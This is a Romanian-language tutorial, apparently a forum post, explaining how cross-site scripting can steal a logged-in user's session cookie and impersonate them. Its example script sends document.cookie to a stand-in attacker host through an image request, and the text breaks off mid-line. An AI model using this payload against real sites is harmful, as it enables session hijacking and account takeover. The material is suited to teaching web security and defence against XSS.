PARTEA 1: Descriere
Folosind atacuri Cross Site Scripting(XSS) devine posibila impersonarea unui utilizator
legitim(victima) care este autentificata pe un website(tinta)
In acest document vom presupune ca site-ul tinta are o vulnerabilitate XSS
care ii permite unui atacator sa injecteze cod rau intentionat intr-o pagina.
Aceasta este secventa de pasi implicate in acest tip de atac
1. Victima se autentifica pe site-ul tinta
2. Atacatorul ii trimite victimei un link spre o pagina(continand cod rau intentionat)
de pe site-ul tinta
3. Victima navigheaza catre pagina
4. Codul continut in acea pagina incarca un script din alta locatie trimitand spre
acesta si cookiul victimei
5. Scriptul foloseste acest cookie pozand drept victima pe site-ul tinta
Exemplificare:
Presupunem ca victima este deja autentificata pe site-ul tinta
Tinta are o vulnerabilitate XSS de forma
[Trebuie sa fiti inscris si conectat pentru a vedea acest link] Atacatorul ii trimite victime link-ul
"http://www.tinta.com/pagina.php?var="
Atuncti cand victima urmeaza linkul scriptul "js.js" este incarcat si executat de browserul acestuia
===== js.js =====
new Image().src='http://www.atacator.com/php.php?cookie= '+escape(document